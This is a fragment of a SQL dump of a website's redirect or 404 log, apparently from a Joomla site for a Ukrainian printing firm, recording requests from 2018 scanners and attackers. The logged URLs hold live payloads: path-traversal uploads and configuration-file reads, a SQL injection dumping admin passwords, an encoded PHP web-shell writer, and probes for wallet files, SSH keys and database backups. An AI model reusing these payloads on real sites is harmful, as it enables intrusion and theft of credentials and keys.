00:00:00',301),(13752,'http://ekvatorprint.com.ua/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=1&cid=1&mid=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-13 12:09:23','0000-00-00 00:00:00',301),(13753,'http://ekvatorprint.com.ua/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=1&cid=1&mid=1&owner=module&id=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-13 12:09:24','0000-00-00 00:00:00',301),(13754,'http://ekvatorprint.com.ua/components/com_foxcontact/lib/uploader.php?cid=1&mid=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-13 12:09:25','0000-00-00 00:00:00',301),(13755,'http://ekvatorprint.com.ua/printing-on-canvas\'A=0',NULL,'http://ekvatorprint.com.ua/printing-on-canvas\'A=0','',1,0,'2018-07-15 18:38:24','0000-00-00 00:00:00',301),(13756,'http://ekvatorprint.com.ua/modules/_mod_bookmark/tmpl/default.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-07-16 11:31:17','0000-00-00 00:00:00',301),(13757,'http://ekvatorprint.com.ua/media/mod_pwebcontact/css/form/blue.css',NULL,'ekvatorprint.com.ua','',1,0,'2018-07-17 11:08:35','0000-00-00 00:00:00',301),(13758,'http://ekvatorprint.com.ua/uslugi',NULL,'','',1,0,'2018-07-19 14:57:34','0000-00-00 00:00:00',301),(13759,'http://ekvatorprint.com.ua/yslugi',NULL,'','',1,0,'2018-07-19 14:57:41','0000-00-00 00:00:00',301),(13760,'http://ekvatorprint.com.ua/wp-content/plugins/s3-video/includes/uploadify.css',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/s3-video/includes/uploadify.css','',1,0,'2018-07-20 01:55:14','0000-00-00 00:00:00',301),(13761,'http://ekvatorprint.com.ua/connectors/system/phpthumb.php',NULL,'','',11,0,'2018-07-20 08:02:35','0000-00-00 00:00:00',301),(13762,'http://ekvatorprint.com.ua/dbs.php',NULL,'','',5,0,'2018-07-20 08:02:35','0000-00-00 00:00:00',301),(13763,'http://ekvatorprint.com.ua/bitcoin/wallet.dat',NULL,'','',4,0,'2018-07-21 00:16:30','0000-00-00 00:00:00',301),(13764,'http://ekvatorprint.com.ua/backup/wallet.dat',NULL,'','',4,0,'2018-07-21 00:16:38','0000-00-00 00:00:00',301),(13765,'http://ekvatorprint.com.ua/wallet.dat',NULL,'','',4,0,'2018-07-21 00:17:25','0000-00-00 00:00:00',301),(13766,'http://ekvatorprint.com.ua/backup/bitcoin/',NULL,'','',4,0,'2018-07-21 00:18:22','0000-00-00 00:00:00',301),(13767,'http://ekvatorprint.com.ua/bitcoin/',NULL,'','',4,0,'2018-07-21 00:18:45','0000-00-00 00:00:00',301),(13768,'http://ekvatorprint.com.ua/assets/super_admin/vendor/jquery-file-upload/server/php/',NULL,'http://ekvatorprint.com.ua/assets/super_admin/vendor/jquery-file-upload/server/php/','',2,0,'2018-07-21 02:44:15','0000-00-00 00:00:00',301),(13769,'http://ekvatorprint.com.ua/banner-printing\'A=0',NULL,'http://ekvatorprint.com.ua/banner-printing\'A=0','',1,0,'2018-07-21 14:06:27','0000-00-00 00:00:00',301),(13770,'http://ekvatorprint.com.ua/cache/ps.php',NULL,'http://ekvatorprint.com.ua/cache/ps.php','',1,0,'2018-07-23 18:34:48','0000-00-00 00:00:00',301),(13771,'http://ekvatorprint.com.ua/manager/index.php',NULL,'http://ekvatorprint.com.ua/manager/index.php','',2,0,'2018-07-25 12:48:15','0000-00-00 00:00:00',301),(13772,'http://ekvatorprint.com.ua/components/com_jbcatalog/jbcatalog.php',NULL,'','',1,0,'2018-07-26 00:43:32','0000-00-00 00:00:00',301),(13773,'http://ekvatorprint.com.ua/components/com_adsmanager/adsmanager.php',NULL,'','',1,0,'2018-07-26 00:45:27','0000-00-00 00:00:00',301),(13774,'http://ekvatorprint.com.ua/components/com_myblog/myblog.php',NULL,'','',1,0,'2018-07-26 00:45:59','0000-00-00 00:00:00',301),(13775,'http://ekvatorprint.com.ua/assets/components/gallery/connector.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-07-26 20:25:26','0000-00-00 00:00:00',301),(13776,'http://ekvatorprint.com.ua/components/com_jbcatalog/libraries/jsupload/server/php/index.php',NULL,'http://ekvatorprint.com.ua/components/com_jbcatalog/libraries/jsupload/server/php/index.php','',5,0,'2018-07-27 07:40:30','0000-00-00 00:00:00',301),(13777,'http://ekvatorprint.com.ua/administrator/components/com_jbcatalog/libraries/jsupload/server/php/index.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jbcatalog/libraries/jsupload/server/php/index.php','',1,0,'2018-07-28 04:33:19','0000-00-00 00:00:00',301),(13778,'http://ekvatorprint.com.ua/wp-includes/js/wpdialog.js',NULL,'ekvatorprint.com.ua','',2,0,'2018-07-28 06:44:40','0000-00-00 00:00:00',301),(13779,'http://ekvatorprint.com.ua/adframe.js',NULL,'http://ekvatorprint.com.ua/printing-on-canvas?yclid=4294774062152426614','',8,0,'2018-07-28 14:54:26','0000-00-00 00:00:00',301),(13780,'http://ekvatorprint.com.ua/print-billboards\'A=0',NULL,'http://ekvatorprint.com.ua/print-billboards\'A=0','',1,0,'2018-07-29 13:45:05','0000-00-00 00:00:00',301),(13781,'http://ekvatorprint.com.ua/,35',NULL,'','',3,0,'2018-07-30 14:30:09','0000-00-00 00:00:00',301),(13782,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/uploadify.css',NULL,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/uploadify.css','',1,0,'2018-08-01 02:43:06','0000-00-00 00:00:00',301),(13783,'http://ekvatorprint.com.ua/components/com_jbusinessdirectory/jbusinessdirectory.php',NULL,'','',1,0,'2018-08-01 19:02:49','0000-00-00 00:00:00',301),(13784,'http://ekvatorprint.com.ua/data/admin/ver.txt',NULL,'','',2,0,'2018-08-05 21:37:18','0000-00-00 00:00:00',301),(13785,'http://ekvatorprint.com.ua/ajax/isclose.asp',NULL,'','',1,0,'2018-08-06 14:16:11','0000-00-00 00:00:00',301),(13786,'http://ekvatorprint.com.ua/website/',NULL,'','',2,0,'2018-08-08 09:36:51','0000-00-00 00:00:00',301),(13787,'http://ekvatorprint.com.ua/en/',NULL,'','',1,0,'2018-08-08 09:36:54','0000-00-00 00:00:00',301),(13788,'http://ekvatorprint.com.ua/wp3/',NULL,'','',2,0,'2018-08-08 14:47:12','0000-00-00 00:00:00',301),(13789,'http://ekvatorprint.com.ua/Old/',NULL,'','',2,0,'2018-08-08 14:47:12','0000-00-00 00:00:00',301),(13790,'http://ekvatorprint.com.ua/wp1/',NULL,'','',2,0,'2018-08-08 14:47:13','0000-00-00 00:00:00',301),(13791,'http://ekvatorprint.com.ua/wp_old/',NULL,'','',2,0,'2018-08-08 14:47:13','0000-00-00 00:00:00',301),(13792,'http://ekvatorprint.com.ua/wp2/',NULL,'','',2,0,'2018-08-08 14:47:13','0000-00-00 00:00:00',301),(13793,'http://ekvatorprint.com.ua/old_wp/',NULL,'','',2,0,'2018-08-08 14:47:13','0000-00-00 00:00:00',301),(13794,'http://ekvatorprint.com.ua/modules/mod_ppc_simple_spotlight/img/hat.pHp.gif?hat=1',NULL,'http://ekvatorprint.com.ua/modules/mod_ppc_simple_spotlight/img/hat.pHp.gif?hat=1','',5,0,'2018-08-09 06:43:01','0000-00-00 00:00:00',301),(13795,'http://ekvatorprint.com.ua/qq.php',NULL,'','',2,0,'2018-08-09 06:49:24','0000-00-00 00:00:00',301),(13796,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/magrabi.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-08-09 11:38:38','0000-00-00 00:00:00',301),(13797,'http://ekvatorprint.com.ua/.vscode/sftp.json',NULL,'','',2,0,'2018-08-09 23:33:52','0000-00-00 00:00:00',301),(13798,'http://ekvatorprint.com.ua/.ssh/id_ecdsa',NULL,'','',2,0,'2018-08-09 23:33:55','0000-00-00 00:00:00',301),(13799,'http://ekvatorprint.com.ua/.ssh/id_ed25519',NULL,'','',3,0,'2018-08-09 23:33:55','0000-00-00 00:00:00',301),(13800,'http://ekvatorprint.com.ua/wpa/',NULL,'','',1,0,'2018-08-11 12:34:14','0000-00-00 00:00:00',301),(13801,'http://ekvatorprint.com.ua/bak.php?login=canshu?',NULL,'','',2,0,'2018-08-12 12:30:41','0000-00-00 00:00:00',301),(13802,'http://ekvatorprint.com.ua/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35',NULL,'','',1,0,'2018-08-15 07:37:00','0000-00-00 00:00:00',301),(13803,'http://ekvatorprint.com.ua/plus/ad_js.php?aid=19',NULL,'','',1,0,'2018-08-15 07:37:01','0000-00-00 00:00:00',301),(13804,'http://ekvatorprint.com.ua/plus/read.php',NULL,'','',1,0,'2018-08-15 07:37:01','0000-00-00 00:00:00',301),(13805,'http://ekvatorprint.com.ua/include/dialog/select_soft_post.php',NULL,'','',1,0,'2018-08-15 07:37:02','0000-00-00 00:00:00',301),(13806,'http://ekvatorprint.com.ua/data/cache/asd.php',NULL,'','',1,0,'2018-08-15 07:37:02','0000-00-00 00:00:00',301),(13807,'http://ekvatorprint.com.ua/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',NULL,'','',2,0,'2018-08-15 07:37:04','0000-00-00 00:00:00',301),(13808,'http://ekvatorprint.com.ua/vendor/phpunit/phpunit/src/Util/PHP/asd.php',NULL,'','',1,0,'2018-08-15 07:37:05','0000-00-00 00:00:00',301),(13809,'http://ekvatorprint.com.ua/da.php',NULL,'http://ekvatorprint.com.ua/install.php','',1,0,'2018-08-15 07:37:11','0000-00-00 00:00:00',301),(13810,'http://ekvatorprint.com.ua/dayrui/libraries/Chart/ofc_upload_image.php?name=shell2734.php',NULL,'','',1,0,'2018-08-15 07:37:12','0000-00-00 00:00:00',301),(13811,'http://ekvatorprint.com.ua/dayrui/libraries/tmp-upload-images/shell2734.php',NULL,'','',1,0,'2018-08-15 07:37:13','0000-00-00 00:00:00',301),(13812,'http://ekvatorprint.com.ua/index.action',NULL,'','',1,0,'2018-08-15 07:37:15','0000-00-00 00:00:00',301),(13813,'http://ekvatorprint.com.ua/search.action',NULL,'','',1,0,'2018-08-15 07:37:16','0000-00-00 00:00:00',301),(13814,'http://ekvatorprint.com.ua/pages/viewpage.action',NULL,'','',1,0,'2018-08-15 07:37:17','0000-00-00 00:00:00',301),(13815,'http://ekvatorprint.com.ua/Backup.sql',NULL,'','',1,0,'2018-08-16 13:16:46','0000-00-00 00:00:00',301),(13816,'http://ekvatorprint.com.ua/Database.sql',NULL,'','',1,0,'2018-08-16 13:16:46','0000-00-00 00:00:00',301),(13817,'http://ekvatorprint.com.ua/Sql.sql',NULL,'','',1,0,'2018-08-16 13:16:47','0000-00-00 00:00:00',301),(13818,'http://ekvatorprint.com.ua/admin/backup.sql/admin/dump.sql/admin/Dump.sql',NULL,'','',1,0,'2018-08-16 13:16:47','0000-00-00 00:00:00',301),(13819,'http://ekvatorprint.com.ua/admin/Backup.sql',NULL,'','',1,0,'2018-08-16 13:16:47','0000-00-00 00:00:00',301),(13820,'http://ekvatorprint.com.ua/admin/backups.sql',NULL,'','',1,0,'2018-08-16 13:16:47','0000-00-00 00:00:00',301),(13821,'http://ekvatorprint.com.ua/admin/database.sql',NULL,'','',1,0,'2018-08-16 13:16:47','0000-00-00 00:00:00',301),(13822,'http://ekvatorprint.com.ua/admin/Database.sql',NULL,'','',1,0,'2018-08-16 13:16:47','0000-00-00 00:00:00',301),(13823,'http://ekvatorprint.com.ua/admin/sql.sql',NULL,'','',1,0,'2018-08-16 13:16:48','0000-00-00 00:00:00',301),(13824,'http://ekvatorprint.com.ua/admin/Sql.sql',NULL,'','',1,0,'2018-08-16 13:16:48','0000-00-00 00:00:00',301),(13825,'http://ekvatorprint.com.ua/backup/backup.sql/backup/dump.sql/backup/Dump.sql',NULL,'','',2,0,'2018-08-16 13:16:48','0000-00-00 00:00:00',301),(13826,'http://ekvatorprint.com.ua/backup/Backup.sql',NULL,'','',2,0,'2018-08-16 13:16:48','0000-00-00 00:00:00',301),(13827,'http://ekvatorprint.com.ua/backup/backups.sql',NULL,'','',2,0,'2018-08-16 13:16:48','0000-00-00 00:00:00',301),(13828,'http://ekvatorprint.com.ua/backup/database.sql',NULL,'','',2,0,'2018-08-16 13:16:48','0000-00-00 00:00:00',301),(13829,'http://ekvatorprint.com.ua/backup/Database.sql',NULL,'','',2,0,'2018-08-16 13:16:48','0000-00-00 00:00:00',301),(13830,'http://ekvatorprint.com.ua/backup/sql.sql',NULL,'','',2,0,'2018-08-16 13:16:50','0000-00-00 00:00:00',301),(13831,'http://ekvatorprint.com.ua/backup/Sql.sql',NULL,'','',2,0,'2018-08-16 13:16:50','0000-00-00 00:00:00',301),(13832,'http://ekvatorprint.com.ua/backups/backup.sql/backups/dump.sql/backups/Dump.sql',NULL,'','',2,0,'2018-08-16 13:16:51','0000-00-00 00:00:00',301),(13833,'http://ekvatorprint.com.ua/backups/Backup.sql',NULL,'','',2,0,'2018-08-16 13:16:51','0000-00-00 00:00:00',301),(13834,'http://ekvatorprint.com.ua/backups/backups.sql',NULL,'','',2,0,'2018-08-16 13:16:51','0000-00-00 00:00:00',301),(13835,'http://ekvatorprint.com.ua/backups/database.sql',NULL,'','',2,0,'2018-08-16 13:16:51','0000-00-00 00:00:00',301),(13836,'http://ekvatorprint.com.ua/backups/Database.sql',NULL,'','',2,0,'2018-08-16 13:16:52','0000-00-00 00:00:00',301),(13837,'http://ekvatorprint.com.ua/backups/sql.sql',NULL,'','',2,0,'2018-08-16 13:16:52','0000-00-00 00:00:00',301),(13838,'http://ekvatorprint.com.ua/backups/Sql.sql',NULL,'','',2,0,'2018-08-16 13:16:52','0000-00-00 00:00:00',301),(13839,'http://ekvatorprint.com.ua/yandex_market/yandexmarket1.xml',NULL,'','',1,0,'2018-08-16 15:35:36','0000-00-00 00:00:00',301),(13840,'http://ekvatorprint.com.ua/files/yandex_market.php',NULL,'','',1,0,'2018-08-16 15:41:10','0000-00-00 00:00:00',301),(13841,'http://ekvatorprint.com.ua/_mod_files/_upload/tmp/yandex_export.xml',NULL,'','',1,0,'2018-08-16 15:46:46','0000-00-00 00:00:00',301),(13842,'http://ekvatorprint.com.ua/yml/yml_products.xml',NULL,'','',1,0,'2018-08-16 15:49:40','0000-00-00 00:00:00',301),(13843,'http://ekvatorprint.com.ua/_mod_files/_upload/tmp/market_full.php',NULL,'','',1,0,'2018-08-16 15:49:47','0000-00-00 00:00:00',301),(13844,'http://ekvatorprint.com.ua/bitrix/products.xml',NULL,'','',1,0,'2018-08-16 15:49:55','0000-00-00 00:00:00',301),(13845,'http://ekvatorprint.com.ua/yandex_market/index.php?route=feed/yandex_market',NULL,'','',1,0,'2018-08-16 15:54:20','0000-00-00 00:00:00',301),(13846,'http://ekvatorprint.com.ua/bitrix/ymarket',NULL,'','',1,0,'2018-08-16 15:55:55','0000-00-00 00:00:00',301),(13847,'http://ekvatorprint.com.ua/bitrix/catalog_export/market_full.php',NULL,'','',1,0,'2018-08-16 15:57:34','0000-00-00 00:00:00',301),(13848,'http://ekvatorprint.com.ua/yandex_market/yamarket.yml',NULL,'','',1,0,'2018-08-16 16:01:02','0000-00-00 00:00:00',301),(13849,'http://ekvatorprint.com.ua/wp-content/uploads/yandex_yml.php',NULL,'','',1,0,'2018-08-16 16:02:41','0000-00-00 00:00:00',301),(13850,'http://ekvatorprint.com.ua/shop/yandex_market/yandex_market/',NULL,'','',1,0,'2018-08-16 16:07:04','0000-00-00 00:00:00',301),(13851,'http://ekvatorprint.com.ua/files/yamarket2.php',NULL,'','',1,0,'2018-08-16 16:16:09','0000-00-00 00:00:00',301),(13852,'http://ekvatorprint.com.ua/market/index.php?option=com_jshopping&controller=wishboxyandexmarket',NULL,'','',1,0,'2018-08-16 16:22:24','0000-00-00 00:00:00',301),(13853,'http://ekvatorprint.com.ua/files/yandex_market',NULL,'','',1,0,'2018-08-16 16:27:31','0000-00-00 00:00:00',301),(13854,'http://ekvatorprint.com.ua/market/yandex_market/',NULL,'','',1,0,'2018-08-16 16:28:08','0000-00-00 00:00:00',301),(13855,'http://ekvatorprint.com.ua/yamarket2.php',NULL,'','',1,0,'2018-08-16 16:31:27','0000-00-00 00:00:00',301),(13856,'http://ekvatorprint.com.ua/yandex_market/yandex_market/',NULL,'','',1,0,'2018-08-16 16:36:11','0000-00-00 00:00:00',301),(13857,'http://ekvatorprint.com.ua/wp-content/uploads/ymarket.xml',NULL,'','',1,0,'2018-08-16 16:37:04','0000-00-00 00:00:00',301),(13858,'http://ekvatorprint.com.ua/modules/yamarket/yandexmarket.xml',NULL,'','',1,0,'2018-08-16 16:40:50','0000-00-00 00:00:00',301),(13859,'http://ekvatorprint.com.ua/market/vm2_market.php',NULL,'','',1,0,'2018-08-16 16:41:13','0000-00-00 00:00:00',301),(13860,'http://ekvatorprint.com.ua/bitrix/yml_products.xml',NULL,'','',1,0,'2018-08-16 16:44:27','0000-00-00 00:00:00',301),(13861,'http://ekvatorprint.com.ua/export/yandex.php',NULL,'','',1,0,'2018-08-16 16:53:15','0000-00-00 00:00:00',301),(13862,'http://ekvatorprint.com.ua/yml/yandex_market.php',NULL,'','',1,0,'2018-08-16 17:06:41','0000-00-00 00:00:00',301),(13863,'http://ekvatorprint.com.ua/catalog_export/yandexmarket.xml',NULL,'','',1,0,'2018-08-16 17:09:41','0000-00-00 00:00:00',301),(13864,'http://ekvatorprint.com.ua/index.php?option=com_jshopping&controller=wishboxyandexmarket',NULL,'','',1,0,'2018-08-16 17:13:49','0000-00-00 00:00:00',301),(13865,'http://ekvatorprint.com.ua/_mod_files/_upload/tmp/yml.php',NULL,'','',1,0,'2018-08-16 17:15:39','0000-00-00 00:00:00',301),(13866,'http://ekvatorprint.com.ua/xml/ymarket',NULL,'','',1,0,'2018-08-16 17:17:12','0000-00-00 00:00:00',301),(13867,'http://ekvatorprint.com.ua/wp-content/uploads/yamarket.yml',NULL,'','',1,0,'2018-08-16 17:17:30','0000-00-00 00:00:00',301),(13868,'http://ekvatorprint.com.ua/wp-content/uploads/index.php?route=feed/yandex_market',NULL,'','',1,0,'2018-08-16 17:20:20','0000-00-00 00:00:00',301),(13869,'http://ekvatorprint.com.ua/yandexmarket/yamarket.xml',NULL,'','',1,0,'2018-08-16 17:21:53','0000-00-00 00:00:00',301),(13870,'http://ekvatorprint.com.ua/yandex_market/yamarket.xml',NULL,'','',1,0,'2018-08-16 17:22:43','0000-00-00 00:00:00',301),(13871,'http://ekvatorprint.com.ua/yandex_market/yandex_yml.php',NULL,'','',1,0,'2018-08-16 17:23:22','0000-00-00 00:00:00',301),(13872,'http://ekvatorprint.com.ua/catalog_export/yamarket1.xml',NULL,'','',1,0,'2018-08-16 17:24:35','0000-00-00 00:00:00',301),(13873,'http://ekvatorprint.com.ua/upload/index.php?option=com_jshopping&controller=wishboxyandexmarket',NULL,'','',1,0,'2018-08-16 17:25:27','0000-00-00 00:00:00',301),(13874,'http://ekvatorprint.com.ua/wp-content/uploads/yandex_market.php',NULL,'','',1,0,'2018-08-16 17:36:04','0000-00-00 00:00:00',301),(13875,'http://ekvatorprint.com.ua/_mod_files/_upload/tmp/yandex_market/',NULL,'','',1,0,'2018-08-16 17:47:05','0000-00-00 00:00:00',301),(13876,'http://ekvatorprint.com.ua/export/yandex_yml.php',NULL,'','',1,0,'2018-08-16 17:51:33','0000-00-00 00:00:00',301),(13877,'http://ekvatorprint.com.ua/export/feed-yml.xml',NULL,'','',1,0,'2018-08-16 17:53:53','0000-00-00 00:00:00',301),(13878,'http://ekvatorprint.com.ua/bitrix/sell.xml',NULL,'','',1,0,'2018-08-16 18:03:44','0000-00-00 00:00:00',301),(13879,'http://ekvatorprint.com.ua/files/vm2_market.php',NULL,'','',1,0,'2018-08-16 18:06:27','0000-00-00 00:00:00',301),(13880,'http://ekvatorprint.com.ua/yandex_market/yandex_export.xml',NULL,'','',1,0,'2018-08-16 18:09:57','0000-00-00 00:00:00',301),(13881,'http://ekvatorprint.com.ua/yml.xml',NULL,'','',1,0,'2018-08-16 18:16:07','0000-00-00 00:00:00',301),(13882,'http://ekvatorprint.com.ua/modules/yamarket/export.yml',NULL,'','',1,0,'2018-08-16 18:20:26','0000-00-00 00:00:00',301),(13883,'http://ekvatorprint.com.ua/export/yml.xml',NULL,'','',1,0,'2018-08-16 18:24:52','0000-00-00 00:00:00',301),(13884,'http://ekvatorprint.com.ua/modules/yamarket/yandex_market/',NULL,'','',1,0,'2018-08-16 18:32:55','0000-00-00 00:00:00',301),(13885,'http://ekvatorprint.com.ua/upload/yamarket2.php',NULL,'','',1,0,'2018-08-16 18:42:06','0000-00-00 00:00:00',301),(13886,'http://ekvatorprint.com.ua/yml/vm2_market.php',NULL,'','',1,0,'2018-08-16 18:44:38','0000-00-00 00:00:00',301),(13887,'http://ekvatorprint.com.ua/yml/index.php?route=feed/yandex_market',NULL,'','',1,0,'2018-08-16 18:53:24','0000-00-00 00:00:00',301),(13888,'http://ekvatorprint.com.ua/yml/yandex_tiu.xml',NULL,'','',1,0,'2018-08-16 19:07:57','0000-00-00 00:00:00',301),(13889,'http://ekvatorprint.com.ua/upload/yandexmarket.xml',NULL,'','',1,0,'2018-08-16 19:08:59','0000-00-00 00:00:00',301),(13890,'http://ekvatorprint.com.ua/shop/yandex_market/yml_products.xml',NULL,'','',1,0,'2018-08-16 19:09:26','0000-00-00 00:00:00',301),(13891,'http://ekvatorprint.com.ua/wp-content/uploads/yandex.php',NULL,'','',1,0,'2018-08-16 19:15:47','0000-00-00 00:00:00',301),(13892,'http://ekvatorprint.com.ua/yandex_market/export.yml',NULL,'','',1,0,'2018-08-16 19:23:59','0000-00-00 00:00:00',301),(13893,'http://ekvatorprint.com.ua/export/export.yml',NULL,'','',1,0,'2018-08-16 19:32:21','0000-00-00 00:00:00',301),(13894,'http://ekvatorprint.com.ua/yandexmarket/yandex_export.yml',NULL,'','',1,0,'2018-08-16 19:33:11','0000-00-00 00:00:00',301),(13895,'http://ekvatorprint.com.ua/wp-content/uploads/yandex_tiu.xml',NULL,'','',1,0,'2018-08-16 20:10:28','0000-00-00 00:00:00',301),(13896,'http://ekvatorprint.com.ua/_mod_files/_upload/tmp/export.yml',NULL,'','',1,0,'2018-08-16 21:48:41','0000-00-00 00:00:00',301),(13897,'http://ekvatorprint.com.ua/printing-on-canvas&utf=1',NULL,'','',1,0,'2018-08-17 04:10:02','0000-00-00 00:00:00',301),(13898,'http://ekvatorprint.com.ua/bitrix/catalog_export/yandex_market.php',NULL,'','',1,0,'2018-08-18 06:02:41','0000-00-00 00:00:00',301),(13899,'http://ekvatorprint.com.ua/&amp',NULL,'','',1,0,'2018-08-23 13:30:52','0000-00-00 00:00:00',301),(13900,'http://ekvatorprint.com.ua/${222+222038492}/price',NULL,'http://ekvatorprint.com.ua/${222+222038492}/price','',1,0,'2018-08-26 08:32:12','0000-00-00 00:00:00',301),(13901,'http://ekvatorprint.com.ua/${222+222038492}/delivery',NULL,'http://ekvatorprint.com.ua/${222+222038492}/delivery','',1,0,'2018-08-26 08:38:07','0000-00-00 00:00:00',301),(13902,'http://ekvatorprint.com.ua/wp-content/plugins/viral-optins/api/uploader/file-uploader.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/viral-optins/api/uploader/file-uploader.php','',1,0,'2018-08-29 23:33:35','0000-00-00 00:00:00',301),(13903,'http://ekvatorprint.com.ua/news/html/?0\'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where\'1\'=\'1.html',NULL,'','',3,0,'2018-08-31 06:30:03','0000-00-00 00:00:00',301),(13904,'http://ekvatorprint.com.ua/umbraco',NULL,'','',3,0,'2018-08-31 08:43:30','0000-00-00 00:00:00',301),(13905,'http://ekvatorprint.com.ua/sitecore',NULL,'','',3,0,'2018-08-31 08:43:30','0000-00-00 00:00:00',301),(13906,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/up.php',NULL,'','',1,0,'2018-09-01 10:44:18','0000-00-00 00:00:00',301),(13907,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/up.php',NULL,'','',1,0,'2018-09-01 10:44:18','0000-00-00 00:00:00',301),(13908,'http://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../attari.php',NULL,'','',1,0,'2018-09-01 10:44:18','0000-00-00 00:00:00',301),(13909,'http://ekvatorprint.com.ua/components/attari.php',NULL,'','',1,0,'2018-09-01 10:44:18','0000-00-00 00:00:00',301),(13910,'http://ekvatorprint.com.ua/index.php?option=com_foxcontact&view=invalid',NULL,'','',1,0,'2018-09-01 10:44:23','0000-00-00 00:00:00',301),(13911,'http://ekvatorprint.com.ua/com_jbcatalog/libraries/jsupload/server/php/files/files/bb.jpg',NULL,'','',1,0,'2018-09-01 10:44:23','0000-00-00 00:00:00',301),(13912,'http://ekvatorprint.com.ua/components/com_sexycontactform/fileupload/files/up.php',NULL,'','',1,0,'2018-09-01 10:44:24','0000-00-00 00:00:00',301),(13913,'http://ekvatorprint.com.ua/index.php?option=com_community&view=groups&groupid=33&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&Itemid=0',NULL,'','',1,0,'2018-09-01 10:44:24','0000-00-00 00:00:00',301),(13914,'http://ekvatorprint.com.ua/plugins/content/wd/wddownload.php?download=wddownload.php&file=../../../configuration.php',NULL,'','',1,0,'2018-09-01 10:44:25','0000-00-00 00:00:00',301),(13915,'http://ekvatorprint.com.ua/index.php?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&Itemid=1',NULL,'','',1,0,'2018-09-01 10:44:25','0000-00-00 00:00:00',301),(13916,'http://ekvatorprint.com.ua/backup/bitcoin/wallet.dat',NULL,'','',3,0,'2018-09-11 22:05:47','0000-00-00 00:00:00',301),(13917,'http://ekvatorprint.com.ua/wallet/',NULL,'','',3,0,'2018-09-11 22:05:55','0000-00-00 00:00:00',301),(13918,'http://ekvatorprint.com.ua/.bitcoin/wallet.dat',NULL,'','',3,0,'2018-09-11 22:05:59','0000-00-00 00:00:00',301),(13919,'http://ekvatorprint.com.ua/bitcoin/backup/wallet.dat',NULL,'','',3,0,'2018-09-11 22:06:07','0000-00-00 00:00:00',301),(13920,'http://ekvatorprint.com.ua/wallet/wallet.dat',NULL,'','',3,0,'2018-09-11 22:06:15','0000-00-00 00:00:00',301),(13921,'http://ekvatorprint.com.ua/wp-content/plugins/fluid_forms/file-upload/server/php/index.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/fluid_forms/file-upload/server/php/index.php','',2,0,'2018-09-13 17:53:35','0000-00-00 00:00:00',301),(13922,'http://ekvatorprint.com.ua/dbadmin/index.php',NULL,'','',3,0,'2018-09-16 15:51:32','0000-00-00 00:00:00',301),(13923,'http://ekvatorprint.com.ua/MyAdmin/index.php',NULL,'','',3,0,'2018-09-16 15:51:33','0000-00-00 00:00:00',301),(13924,'http://ekvatorprint.com.ua/phpMyAdmin-4.8.0-all-languages/index.php',NULL,'','',3,0,'2018-09-16 15:51:33','0000-00-00 